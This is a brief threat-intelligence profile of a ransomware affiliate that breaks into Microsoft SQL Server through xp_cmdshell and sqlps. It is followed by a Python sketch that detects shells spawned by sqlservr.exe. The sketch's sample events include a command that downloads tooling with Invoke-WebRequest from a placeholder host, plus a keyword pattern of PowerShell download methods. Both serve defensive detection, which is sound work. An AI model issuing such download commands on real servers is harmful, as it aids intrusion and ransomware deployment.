Scion Spider

Details

SCION SPIDER is a Ransomware-as-a-Service (RaaS) affiliate that achieves initial access by compromising servers running Microsoft SQL Server. The adversary typically uses the built-in SQL Server extended stored procedure xp_cmdshell to run shell commands and particularly favors the SQL Server-native sqlps utility to run PowerShell (PS) commands that download additional tooling. SCION SPIDER frequently...
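
A detection sketch for the behavior described above, added here as an example and not taken from the original page or its vendor: it walks process-creation events and flags cmd.exe spawned by sqlservr.exe (the process shape xp_cmdshell produces) and sqlps/PowerShell hosts descended from it. The field names, file paths, download keywords and sample events are assumptions constructed for illustration.

```python
import ntpath
import re

# Constructed process-creation events (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 1200, "ppid": 700, "image": r"C:\MSSQL\Binn\sqlservr.exe",
     "cmd": "sqlservr.exe -sMSSQLSERVER"},
    {"pid": 4312, "ppid": 1200, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /c sqlps -Command "Invoke-WebRequest http://example.invalid/t -OutFile t"'},
    {"pid": 4320, "ppid": 4312, "image": r"C:\MSSQL\Tools\Binn\SQLPS.exe",
     "cmd": r'sqlps -Command "Invoke-WebRequest http://example.invalid/t -OutFile t"'},
    # Administrator running sqlps interactively: no SQL Server ancestor, so no alert.
    {"pid": 5100, "ppid": 900, "image": r"C:\MSSQL\Tools\Binn\SQLPS.exe",
     "cmd": "sqlps -Command Get-Service"},
]

SQL_SERVER = "sqlservr.exe"
PS_HOSTS = {"sqlps.exe", "powershell.exe", "pwsh.exe"}
# Assumed keyword list for "downloads additional tooling"; tune for your environment.
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|start-bitstransfer", re.I)

def base(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()

def detect(events):
    """Return (pid, severity, reason) for shell activity descended from sqlservr.exe.
    Simplification: PIDs are assumed unique within the batch (no PID reuse)."""
    by_pid = {e["pid"]: e for e in events}

    def under_sql(e):
        seen = set()
        while e and e["pid"] not in seen:  # guard against parent loops
            seen.add(e["pid"])
            e = by_pid.get(e["ppid"])
            if e and base(e["image"]) == SQL_SERVER:
                return True
        return False

    alerts = []
    for e in events:
        if not under_sql(e):
            continue
        name = base(e["image"])
        if name in PS_HOSTS:
            sev = "high" if DOWNLOAD_RE.search(e["cmd"]) else "medium"
            alerts.append((e["pid"], sev, f"{name} descended from {SQL_SERVER}"))
        elif name == "cmd.exe" and base(by_pid[e["ppid"]]["image"]) == SQL_SERVER:
            alerts.append((e["pid"], "medium", "cmd.exe spawned by sqlservr.exe (xp_cmdshell)"))
    return alerts
```

Where xp_cmdshell has no legitimate use on a server, any alert from this logic is worth triage; otherwise baseline the known maintenance jobs first.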

